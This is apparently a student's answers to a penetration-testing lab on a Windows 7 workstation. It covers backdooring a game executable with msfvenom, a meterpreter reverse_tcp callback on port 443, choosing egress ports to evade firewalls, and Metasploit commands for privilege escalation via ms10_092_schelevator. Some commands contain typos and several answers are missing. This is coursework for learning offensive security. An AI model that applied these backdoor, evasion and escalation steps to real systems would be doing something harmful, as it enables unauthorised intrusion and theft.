Professional Documents
Culture Documents
Q2 - Based on what NMap has found about the victim, how valuable would it be to do an
unauthenticated scan of the workstation IP with a vulnerability scanner such as
Nessus/NeXpose/OpenVAS? Explain your reasoning.
Not much valuable, nmap already gave us the running services and their version which would
be enough to search if there is vulnerabilities out there
Q3 - What is the size (in bytes) of the backdoored game file? = 182784
What is the size (in bytes) of the original game file? = 118784
Q4 - Describe in a way that a company CEO could understand what the above msfvenom
command does.
It creates a payload that will allow an attack to gain access to the system, it appends that
payload to an exe file in this case its a game and then it encrypts it to make it undetectable to
antivirus
In addition, describe this in a way that a CEO could understand specifically what
“windows/meterpreter/reverse_tcp” is and what it does.
Its a payload that if installed in a victims machine will try to send out connection probes to the
attackers machine, it has the ip address and port number to initialize the connection
If the victim has firewall with egress filtering then important ports like 443 which is https will be
most probably be open
What other ports would probably work just as well and why?
Ports 53, 22 etc... most firewall egress filtering will allow these well known ports
Q6 - What is the difference between the reverse_tcp stager and the reverse_http stager?
In reverse_http communication between payload and metasploit takes place over http protocol
so its less suspicious
When you know there victims machine is using egress filtering on their firewall
Q7 - Describe two other ways that might work to get our malware onto a user’s workstation other
than via email or web. Assume social engineering may be required.
Q8 - Privilege escalation: Using only the meterpreter shell, attempt to escalate your privileges to
an Administrator or SYSTEM. Show how you did this and proof that it worked.
msfconfole
use multi/handler
use exploit/windows/x64/meterpreter/reverse_tcp
set LHOST=10.20.0.134
set LPORT=443
exploit
use post/multi/recon/local_exploit_sugester
use exploit/windows/local/ms10_092_schelevator
exploit
Sysinfo
Q10 - Pillaging: Using only the meterpreter shell, search user directories for potentially sensitive
documents and images. Download them to the lab5-loot directory. Show the contents of the
Q11 - Persistence: Using only the meterpreter shell, install meterpreter as a service so that it
persistently tries to connect back to your Kali VM on port 443 every 60 seconds.
Prove that it works by rebooting the Windows workstation and setting up another multi/handler
on Kali to demonstrate that you are able to get another meterpreter shell when it restarts.
Running uptodate antivirus, in our case the windows 7 didn't have a running antivirus, even if
the url check fails to detect the malicious file you should have second defence that will detect
suspicious activities when the file is run and that is done by the antivirus